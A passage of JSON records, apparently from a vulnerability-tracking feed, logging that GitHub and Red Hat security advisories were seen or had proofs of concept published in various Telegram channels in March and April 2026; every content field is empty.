"Telegram/nw5w-o_hs-CK0Rjuv5tJSQsl41JpqhSQHTKMS_4QN8816OY", "content": "", "creation_timestamp": "2026-03-31T17:25:19.000000Z"}, {"uuid": "59f4ef49-9d14-4719-909a-fcf8a2ba49b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VPJ2-QQ7W-5QQ6", "type": "published-proof-of-concept", "source": "Telegram/DQ_c3fg_zqy6DN4suTckTk8JzzlHKPkbNE2HsjPTkc7SF-k", "content": "", "creation_timestamp": "2026-03-31T17:25:56.000000Z"}, {"uuid": "3bb12359-e170-4604-bf9b-01192a8c4900", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QPFV-44F3-QQX6", "type": "published-proof-of-concept", "source": "Telegram/DQ_c3fg_zqy6DN4suTckTk8JzzlHKPkbNE2HsjPTkc7SF-k", "content": "", "creation_timestamp": "2026-03-31T17:25:56.000000Z"}, {"uuid": "2bfaf5e6-6d10-4fd8-8ff4-7466f34cb8a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VM9R-H74P-HG97", "type": "published-proof-of-concept", "source": "Telegram/DQ_c3fg_zqy6DN4suTckTk8JzzlHKPkbNE2HsjPTkc7SF-k", "content": "", "creation_timestamp": "2026-03-31T17:25:56.000000Z"}, {"uuid": "b342dc50-efbc-4cca-91e9-50c87d25eca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9528-X887-J2FP", "type": "seen", "source": "Telegram/ky16Z8CpY9UfGCFQKDuXqskkeRz_ODLCHisg6zhKBGmfTV8", "content": "", "creation_timestamp": "2026-03-31T17:24:58.000000Z"}, {"uuid": "f4c7a575-ef58-49a5-9710-9a77e60cc250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC5H-PMR3-3497", "type": "seen", "source": "Telegram/ky16Z8CpY9UfGCFQKDuXqskkeRz_ODLCHisg6zhKBGmfTV8", "content": "", "creation_timestamp": "2026-03-31T17:24:58.000000Z"}, {"uuid": "3cbd7159-e9db-4a81-835c-6e1f746f617b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63MG-XP9J-JFCM", "type": "seen", "source": "Telegram/ky16Z8CpY9UfGCFQKDuXqskkeRz_ODLCHisg6zhKBGmfTV8", "content": "", "creation_timestamp": "2026-03-31T17:24:58.000000Z"}, {"uuid": "f67f58c6-9f21-44bb-973f-d0054ffe614a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FRV4-X25R-588M", "type": "seen", "source": "Telegram/nw5w-o_hs-CK0Rjuv5tJSQsl41JpqhSQHTKMS_4QN8816OY", "content": "", "creation_timestamp": "2026-03-31T17:25:19.000000Z"}, {"uuid": "7c3f1953-bb9c-4e0e-9f27-6f1024138b41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RX4H-526Q-4458", "type": "seen", "source": "Telegram/8TNuFRjRJBw5r6zwiOXWd_T-cqnzTtiBnsbsFB7NS1OTWS8", "content": "", "creation_timestamp": "2026-03-31T23:20:56.000000Z"}, {"uuid": "7bc55489-4add-4631-96a1-95f844aca604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QXGF-HMCJ-3XW3", "type": "seen", "source": "Telegram/kcbrs7WW_w-nIPeTyrZTDg68aatJd3a7QKUME-vVoB020PA", "content": "", "creation_timestamp": "2026-03-31T19:20:10.000000Z"}, {"uuid": "2b499a6d-a35d-4a6e-b761-c122ae642c43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M2H6-4XPQ-QW3M", "type": "seen", "source": "Telegram/kcbrs7WW_w-nIPeTyrZTDg68aatJd3a7QKUME-vVoB020PA", "content": "", "creation_timestamp": "2026-03-31T19:20:10.000000Z"}, {"uuid": "8a4ec69c-4b53-4ace-afbd-2d348c87bafd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HPM8-9QX6-JVWV", "type": "published-proof-of-concept", "source": "Telegram/KAeZyql0w7ADSWCNfrKYv7UvYEMEw072WjtVkI_nGvWCcTc", "content": "", "creation_timestamp": "2026-03-31T21:19:25.000000Z"}, {"uuid": "7f68e449-a723-43f6-b97e-54b824b02d4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PC5V-8XWC-V9XQ", "type": "published-proof-of-concept", "source": "Telegram/KAeZyql0w7ADSWCNfrKYv7UvYEMEw072WjtVkI_nGvWCcTc", "content": "", "creation_timestamp": "2026-03-31T21:19:25.000000Z"}, {"uuid": "b3a99d32-3fde-4875-b14b-cce2229c70a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35JH-R3H4-6JHM", "type": "seen", "source": "Telegram/OA0BhF0tC6EPmRi9BAj0aaRm3q83l75bwQVc9b2koDj48CY", "content": "", "creation_timestamp": "2026-03-31T21:19:34.000000Z"}, {"uuid": "27230c54-fdc2-45cc-a8a3-e60c333e3983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF66-236V-P4FG", "type": "seen", "source": "Telegram/8TNuFRjRJBw5r6zwiOXWd_T-cqnzTtiBnsbsFB7NS1OTWS8", "content": "", "creation_timestamp": "2026-03-31T23:20:56.000000Z"}, {"uuid": "0882af5b-f077-444b-91b4-4c6c384dc774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GV25-WP4H-9C35", "type": "seen", "source": "Telegram/8TNuFRjRJBw5r6zwiOXWd_T-cqnzTtiBnsbsFB7NS1OTWS8", "content": "", "creation_timestamp": "2026-03-31T23:20:56.000000Z"}, {"uuid": "c7a37b31-55c3-4faa-b692-f8dbfeadaba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C77M-R996-JR3Q", "type": "seen", "source": "Telegram/8TNuFRjRJBw5r6zwiOXWd_T-cqnzTtiBnsbsFB7NS1OTWS8", "content": "", "creation_timestamp": "2026-03-31T23:20:56.000000Z"}, {"uuid": "1c1f300e-f05b-4c24-a44a-f6103eacd8ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VH89-RJPH-2G7P", "type": "seen", "source": "Telegram/_jbWMrWY3kup1vLwq2L3T9QUurzdP-pS58MJj_OuG7oT4-o", "content": "", "creation_timestamp": "2026-04-01T23:26:42.000000Z"}, {"uuid": "aa3c54ce-1df2-4624-a1c7-00fb25ca7935", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6R7F-Q7F5-WPX8", "type": "seen", "source": "Telegram/bl6LC3S0UxxO5vDfC3lE4LaBC6O_bKrhuhRcx8XqwmK5Cxg", "content": "", "creation_timestamp": "2026-04-01T23:27:18.000000Z"}, {"uuid": "8023747a-1e87-44a7-96e8-1e713e40b64d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2QCP-24FH-FX6P", "type": "seen", "source": "Telegram/bl6LC3S0UxxO5vDfC3lE4LaBC6O_bKrhuhRcx8XqwmK5Cxg", "content": "", "creation_timestamp": "2026-04-01T23:27:18.000000Z"}, {"uuid": "963afdc1-03f5-48f9-98a1-b4476fdafeab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8MCF-RP68-XHFG", "type": "seen", "source": "Telegram/bl6LC3S0UxxO5vDfC3lE4LaBC6O_bKrhuhRcx8XqwmK5Cxg", "content": "", "creation_timestamp": "2026-04-01T23:27:18.000000Z"}, {"uuid": "60ba6eb3-fd41-443e-9d84-41ed5358422c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X8JC-JVQM-PM3F", "type": "published-proof-of-concept", "source": "Telegram/W-ZMhqLt3Z16f8AdFiB8UF-gG99_9hpwzW6X3s6aq-w7Q74", "content": "", "creation_timestamp": "2026-04-01T23:27:26.000000Z"}, {"uuid": "97805152-a75c-4ed4-b624-75521f1c8579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H762-RHV3-H25V", "type": "published-proof-of-concept", "source": "Telegram/W-ZMhqLt3Z16f8AdFiB8UF-gG99_9hpwzW6X3s6aq-w7Q74", "content": "", "creation_timestamp": "2026-04-01T23:27:26.000000Z"}, {"uuid": "e446fb05-71ab-482b-a684-e55d808fb97a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VC68-257W-M432", "type": "published-proof-of-concept", "source": "Telegram/W-ZMhqLt3Z16f8AdFiB8UF-gG99_9hpwzW6X3s6aq-w7Q74", "content": "", "creation_timestamp": "2026-04-01T23:27:26.000000Z"}, {"uuid": "e0de55a6-b622-4147-bbcd-2a2200d85bc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:6478", "type": "seen", "source": "Telegram/1FZmwvj65iY9NiI7VGWCBujhZKTilfhPPvdqi0EqVANQnis", "content": "", "creation_timestamp": "2026-04-02T15:20:57.000000Z"}, {"uuid": "19a56c93-295e-4dd5-b6f1-2df88cffc733", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:6477", "type": "seen", "source": "Telegram/1FZmwvj65iY9NiI7VGWCBujhZKTilfhPPvdqi0EqVANQnis", "content": "", "creation_timestamp": "2026-04-02T15:20:57.000000Z"}, {"uuid": "cccc5ecd-870d-4acf-9671-b50c57fbe4fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V9P7-GF3Q-H779", "type": "published-proof-of-concept", "source": "Telegram/XKiVP0TBNKcSgroBasKUd6A0zwSV-UpgyYoSDTGkjCiQdks", "content": "", "creation_timestamp": "2026-04-03T17:26:02.000000Z"}, {"uuid": "099a79d3-5042-4f5c-8d17-14ea96c9c061", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3R9X-F23J-GC73", "type": "published-proof-of-concept", "source": "Telegram/XKiVP0TBNKcSgroBasKUd6A0zwSV-UpgyYoSDTGkjCiQdks", "content": "", "creation_timestamp": "2026-04-03T17:26:02.000000Z"}, {"uuid": "ec50d3bb-b3ec-42db-96cc-a0eb5e1ba28e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2XQQ-6778-H4J9", "type": "published-proof-of-concept", "source": "Telegram/LEqzgESE2wGHUVmUGbeDXDuSp8F8SqNkH2O3nuA9S_KVO2A", "content": "", "creation_timestamp": "2026-04-02T22:22:27.000000Z"}, {"uuid": "a8f9da96-b52c-47e3-ae4d-e08da0d3709f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98CH-45WP-CH47", "type": "published-proof-of-concept", "source": "Telegram/LEqzgESE2wGHUVmUGbeDXDuSp8F8SqNkH2O3nuA9S_KVO2A", "content": "", "creation_timestamp": "2026-04-02T22:22:27.000000Z"}, {"uuid": "9cfb4d66-1e94-4b68-87f9-4881eceec069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JGFX-74G2-9R6G", "type": "published-proof-of-concept", "source": "Telegram/LEqzgESE2wGHUVmUGbeDXDuSp8F8SqNkH2O3nuA9S_KVO2A", "content": "", "creation_timestamp": "2026-04-02T22:22:27.000000Z"}, {"uuid": "522b5955-c099-4ef7-af01-53c9e4ce7e08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q253-6WCM-H8HP", "type": "seen", "source": "Telegram/8YijTp8Bkg1BgPYn1xfGtyu-IfZ2h3UIXQPTCviuLwYJAlo", "content": "", "creation_timestamp": "2026-04-02T22:22:50.000000Z"}, {"uuid": "65980bd6-cc28-4a44-a1a9-037fca461ee7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XPH3-R2JF-4VP3", "type": "seen", "source": "Telegram/8YijTp8Bkg1BgPYn1xfGtyu-IfZ2h3UIXQPTCviuLwYJAlo", "content": "", "creation_timestamp": "2026-04-02T22:22:50.000000Z"}, {"uuid": "0ab54b30-576d-4c20-8c7d-97e7de1f2d16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XW59-HVM2-8PJ6", "type": "seen", "source": "Telegram/8YijTp8Bkg1BgPYn1xfGtyu-IfZ2h3UIXQPTCviuLwYJAlo", "content": "", "creation_timestamp": "2026-04-02T22:22:50.000000Z"}, {"uuid": "44c3be02-e2f7-498d-91db-71a2277bff1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FVVP-RJ8G-C7GC", "type": "seen", "source": "Telegram/8YijTp8Bkg1BgPYn1xfGtyu-IfZ2h3UIXQPTCviuLwYJAlo", "content": "", "creation_timestamp": "2026-04-02T22:22:50.000000Z"}, {"uuid": "5c3598a5-157b-4c28-aaa3-ba7d7163d0ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6WC5-RHVJ-CX7F", "type": "seen", "source": "Telegram/EKU3EO0GNZYVnupMzIC7jT0Kx1d9wsZeA8MakquUKITh-r8", "content": "", "creation_timestamp": "2026-04-02T22:22:55.000000Z"}, {"uuid": "2237a932-8978-4269-a9ce-4ae4a8497105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47PM-883H-885R", "type": "seen", "source": "Telegram/EKU3EO0GNZYVnupMzIC7jT0Kx1d9wsZeA8MakquUKITh-r8", "content": "", "creation_timestamp": "2026-04-02T22:22:55.000000Z"}, {"uuid": "cc2e4bfe-704d-40f8-8e2b-f70abc2776a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJ4R-HR4H-G98V", "type": "seen", "source": "Telegram/3gsJ80xyJgAiTFZiH4SjKRBEhW5SG_PU_uKPeFIX1uRKbZ4", "content": "", "creation_timestamp": "2026-04-02T22:23:23.000000Z"}, {"uuid": "1f313dcf-00dc-4495-8ddd-26d63496b809", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6C3W-7XG4-4CF7", "type": "seen", "source": "Telegram/3gsJ80xyJgAiTFZiH4SjKRBEhW5SG_PU_uKPeFIX1uRKbZ4", "content": "", "creation_timestamp": "2026-04-02T22:23:23.000000Z"}, {"uuid": "23823a4c-edd7-4a3e-b6eb-4fda5aa2ca01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G87C-R2JP-293W", "type": "published-proof-of-concept", "source": "Telegram/XKiVP0TBNKcSgroBasKUd6A0zwSV-UpgyYoSDTGkjCiQdks", "content": "", "creation_timestamp": "2026-04-03T17:26:02.000000Z"}, {"uuid": "7d760aea-84ce-4a30-bae6-735dd63c1101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-85M8-G393-JCXF", "type": "seen", "source": "Telegram/9bl7FEfQKeFpZFPlYLUaNlRChLBL7dB3Syrn3BTLiX1da84", "content": "", "creation_timestamp": "2026-04-01T23:27:43.000000Z"}, {"uuid": "0c2b756f-652d-4427-8d01-f3706d967ada", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4333-387X-W245", "type": "seen", "source": "Telegram/9bl7FEfQKeFpZFPlYLUaNlRChLBL7dB3Syrn3BTLiX1da84", "content": "", "creation_timestamp": "2026-04-01T23:27:43.000000Z"}, {"uuid": "0bb63a35-b335-48e7-a6f4-0f6eebfed2b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GHFJ-FX47-WG97", "type": "seen", "source": "Telegram/9bl7FEfQKeFpZFPlYLUaNlRChLBL7dB3Syrn3BTLiX1da84", "content": "", "creation_timestamp": "2026-04-01T23:27:43.000000Z"}, {"uuid": "9d2b8454-a442-4190-baf6-f925483dd6c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-458R-H248-29C5", "type": "seen", "source": "Telegram/coMrEhctUArWfU_1Esx58b8AZjuGB_2Ws5YwoScTDx0IuKI", "content": "", "creation_timestamp": "2026-04-01T23:27:52.000000Z"}, {"uuid": "f252ef9b-6dbc-462e-be91-aa1c61a37981", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G4PP-FHGF-8653", "type": "seen", "source": "Telegram/coMrEhctUArWfU_1Esx58b8AZjuGB_2Ws5YwoScTDx0IuKI", "content": "", "creation_timestamp": "2026-04-01T23:27:52.000000Z"}, {"uuid": "1bbdb811-897b-4c06-997d-eb956675eb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XGH5-W62M-8MPR", "type": "seen", "source": "Telegram/coMrEhctUArWfU_1Esx58b8AZjuGB_2Ws5YwoScTDx0IuKI", "content": "", "creation_timestamp": "2026-04-01T23:27:52.000000Z"}, {"uuid": "f1125e71-d375-4af3-b709-9f0acffc4f5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:6478", "type": "published-proof-of-concept", "source": "Telegram/613aY007LGHyW6_rIrja4BsrlzuBvUbPzSCrjge10VR5WoE", "content": "", "creation_timestamp": "2026-04-02T15:21:07.000000Z"}, {"uuid": "f097a0de-e447-4c57-98ac-f83964031186", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:6477", "type": "published-proof-of-concept", "source": "Telegram/613aY007LGHyW6_rIrja4BsrlzuBvUbPzSCrjge10VR5WoE", "content": "", "creation_timestamp": "2026-04-02T15:21:07.000000Z"}, {"uuid": "7226d1a0-8621-4cb4-bd29-26c05c532d79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQQJ-F979-8C8M", "type": "published-proof-of-concept", "source": "Telegram/qTocgF1bA6EikMAxrpKqC2AQPtdVVaE6KT_y64KQmK5LJ1E", "content": "", "creation_timestamp": "2026-04-03T21:17:42.000000Z"}, {"uuid": "1fc72a23-1a86-485a-bbe3-9bb4530167be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8XP-WVCX-P6F4", "type": "published-proof-of-concept", "source": "Telegram/qTocgF1bA6EikMAxrpKqC2AQPtdVVaE6KT_y64KQmK5LJ1E", "content": "", "creation_timestamp": "2026-04-03T21:17:42.000000Z"}, {"uuid": "84b80b3e-6e8e-440f-a457-d1636f7e3cd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6VH2-H83C-9294", "type": "published-proof-of-concept", "source": "Telegram/ezSRO2n6kkNgiasayGpOrLqy53F2jkH_PorQ5yznSyeF-oc", "content": "", "creation_timestamp": "2026-04-04T01:18:36.000000Z"}, {"uuid": "95d5250b-e096-4e57-863b-5274d98aabf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X6M9-GXVR-7JPV", "type": "published-proof-of-concept", "source": "Telegram/ezSRO2n6kkNgiasayGpOrLqy53F2jkH_PorQ5yznSyeF-oc", "content": "", "creation_timestamp": "2026-04-04T01:18:36.000000Z"}, {"uuid": "6d7779bf-769b-47fd-9712-a6e19ed72251", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9CQ8-3V94-434G", "type": "published-proof-of-concept", "source": "Telegram/ezSRO2n6kkNgiasayGpOrLqy53F2jkH_PorQ5yznSyeF-oc", "content": "", "creation_timestamp": "2026-04-04T01:18:36.000000Z"}, {"uuid": "e661ed1d-9ff6-47cc-bac9-b66d9f854661", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VXRP-5PG7-7V4X", "type": "seen", "source": "Telegram/asfs2Uk_HDA2dEAWxK7wNvn0OefGesF-RFz1ocNui3XpVnY", "content": "", "creation_timestamp": "2026-04-02T17:37:18.000000Z"}, {"uuid": "127e98a9-10d4-4655-a6b1-610bb0a01fd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7P93-6934-F4Q7", "type": "seen", "source": "Telegram/asfs2Uk_HDA2dEAWxK7wNvn0OefGesF-RFz1ocNui3XpVnY", "content": "", "creation_timestamp": "2026-04-02T17:37:18.000000Z"}, {"uuid": "0ce1e125-a533-43f4-963d-4255d8565ae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86VG-W8VM-M3GG", "type": "seen", "source": "Telegram/asfs2Uk_HDA2dEAWxK7wNvn0OefGesF-RFz1ocNui3XpVnY", "content": "", "creation_timestamp": "2026-04-02T17:37:18.000000Z"}, {"uuid": "1da3ad50-1205-47fc-9cbe-1ee21088e304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VV7Q-7JX5-F767", "type": "seen", "source": "Telegram/asfs2Uk_HDA2dEAWxK7wNvn0OefGesF-RFz1ocNui3XpVnY", "content": "", "creation_timestamp": "2026-04-02T17:37:18.000000Z"}, {"uuid": "40085e2c-d5da-4551-a711-c5a81620d036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HVP5-GPR6-J4GP", "type": "seen", "source": "Telegram/c85hrsWNyFY_wFes4s7T57trjOQm7U5y5MEbFlOtoT8A7NA", "content": "", "creation_timestamp": "2026-04-02T15:21:36.000000Z"}, {"uuid": "19c11b5f-3ad0-4f52-8c42-8fa806670c4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2FR7-CC4F-WH98", "type": "seen", "source": "Telegram/c85hrsWNyFY_wFes4s7T57trjOQm7U5y5MEbFlOtoT8A7NA", "content": "", "creation_timestamp": "2026-04-02T15:21:36.000000Z"}, {"uuid": "2301d5d8-9ab0-4d94-a894-97dc5914f9c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQRM-53PC-WX28", "type": "seen", "source": "Telegram/iLkahKLtHBTX_rPbdzPdcuEMJtP6ph5Cfo4EzqcCLMOd2c4", "content": "", "creation_timestamp": "2026-04-02T17:36:35.000000Z"}, {"uuid": "c069998a-9eb5-4e6f-b810-ed53f86146c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HR89-H2PP-F3C8", "type": "seen", "source": "Telegram/3_7miVMXR04DKfwyt7TTlg-rZzunXudUntV94ZrNBpzOyTo", "content": "", "creation_timestamp": "2026-04-02T17:37:03.000000Z"}, {"uuid": "7082244f-dce1-43eb-9b0d-762db135fe20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38M8-XRFJ-V38X", "type": "seen", "source": "Telegram/s8qY890P48N3Wo9aQa8rI-zenhf5cWovFj-1HEcEoggzt84", "content": "", "creation_timestamp": "2026-04-02T17:37:38.000000Z"}, {"uuid": "22b81b13-94d1-46ba-81cd-6769d133acec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X8HC-FQV3-7GWF", "type": "seen", "source": "Telegram/zX6Kqs44rDek2r3jgp5vC_S4jdZwe09icUbxsylGXOdI3O8", "content": "", "creation_timestamp": "2026-04-02T19:26:18.000000Z"}, {"uuid": "20aad377-aba5-4601-a9e4-d49953bcc862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q3P6-G7C4-829C", "type": "seen", "source": "Telegram/zX6Kqs44rDek2r3jgp5vC_S4jdZwe09icUbxsylGXOdI3O8", "content": "", "creation_timestamp": "2026-04-02T19:26:18.000000Z"}, {"uuid": "ad8354e5-dfb5-47e0-b374-047559e704a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P23-P2M4-2R4M", "type": "seen", "source": "Telegram/zX6Kqs44rDek2r3jgp5vC_S4jdZwe09icUbxsylGXOdI3O8", "content": "", "creation_timestamp": "2026-04-02T19:26:18.000000Z"}, {"uuid": "05b9c850-d71a-4607-8b4d-c068703d953f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJW9-34GF-RP6M", "type": "published-proof-of-concept", "source": "Telegram/DJsg5Qi7j92DgCP14lqfeXU4IPClBfbIww0fpCMr4ueipk0", "content": "", "creation_timestamp": "2026-04-03T17:26:40.000000Z"}, {"uuid": 